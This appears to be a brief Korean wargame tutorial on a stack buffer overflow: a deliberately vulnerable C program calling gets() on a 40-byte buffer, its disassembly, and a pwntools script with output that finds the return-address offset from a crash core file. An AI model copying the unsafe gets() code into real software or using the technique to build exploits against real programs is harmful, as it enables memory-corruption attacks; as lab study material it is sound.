예시 코드
#include <stdio.h>
#include <string.h>
int main() {
char buffer[40];
gets(buffer);
return 0;
}
offset
0x00000000004004ef <+8>: lea rax,[rbp-0x30] // rax = buffer
0x00000000004004f3 <+12>: mov rdi,rax // rdi = buffer
0x00000000004004f6 <+15>: mov eax,0x0
0x00000000004004fb <+20>: call 0x4003f0 <gets@plt> // gets(buffer)
자동화
from pwn import *
e = ELF("./bof")
def get_offset():
io = e.process()
io.sendline(cyclic(1024))
io.wait()
core = io.corefile
io.close()
os.remove(core.file.name)
offset = cyclic_find(core.read(core.rsp, 4))
return offset
$ python3 offset.py
[*] '/home/ion/wargame/bof'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
[+] Starting local process '/home/ion/wargame/bof': pid 201
[*] Process '/home/ion/wargame/bof' stopped with exit code -11 (SIGSEGV) (pid 201)
[!] Error parsing corefile stack: Found bad environment at 0x7ffcb9da1fd1
[+] Parsing corefile...: Done [*] '/home/ion/wargame/core.201'
Arch: amd64-64-little
RIP: 0x400506
RSP: 0x7ffcb9da0ff8
Exe: '/home/ion/wargame/bof' (0x400000)
Fault: 0x616161706161616f
[*] offset: 56
